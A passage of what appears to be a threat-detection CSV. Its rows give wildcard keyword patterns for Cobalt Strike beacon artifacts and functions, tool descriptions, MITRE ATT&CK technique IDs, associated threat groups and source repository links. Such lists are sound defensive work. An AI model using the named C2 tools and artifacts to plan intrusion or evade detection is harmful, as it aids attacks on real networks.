T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,1,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z -*beacon_output_ps.cna*,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,1,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z -*beacon_print*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/wumb0/rust_bof,1,1,N/A,10,10,189,22,2023-03-03T22:53:02Z,2022-02-28T23:46:00Z -*BEACON_RDLL_*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon_remote_exec_*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*beacon_remote_exec_method_describe*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon_remote_exec_method_register*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon_remote_exec_methods*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon_remote_exploit*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*beacon_remote_exploit_arch*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon_remote_exploit_describe*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon_remote_exploit_register*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon_remote_exploits*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon_smb.exe*,offensive_tool_keyword,cobaltstrike,default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*Beacon_Stage_p2_Stuct*,offensive_tool_keyword,cobaltstrike,SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tylous/SourcePoint,1,1,N/A,10,10,792,122,2022-11-17T01:04:04Z,2021-08-06T20:55:26Z -*beacon_stage_pipe*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*beacon_stage_pipe*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*Beacon_Stage_Struct_p1*,offensive_tool_keyword,cobaltstrike,SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tylous/SourcePoint,1,1,N/A,10,10,792,122,2022-11-17T01:04:04Z,2021-08-06T20:55:26Z -*Beacon_Stage_Struct_p3*,offensive_tool_keyword,cobaltstrike,SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tylous/SourcePoint,1,1,N/A,10,10,792,122,2022-11-17T01:04:04Z,2021-08-06T20:55:26Z -*beacon_stage_tcp*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*beacon_stage_tcp*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon_test.exe*,offensive_tool_keyword,cobaltstrike,default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 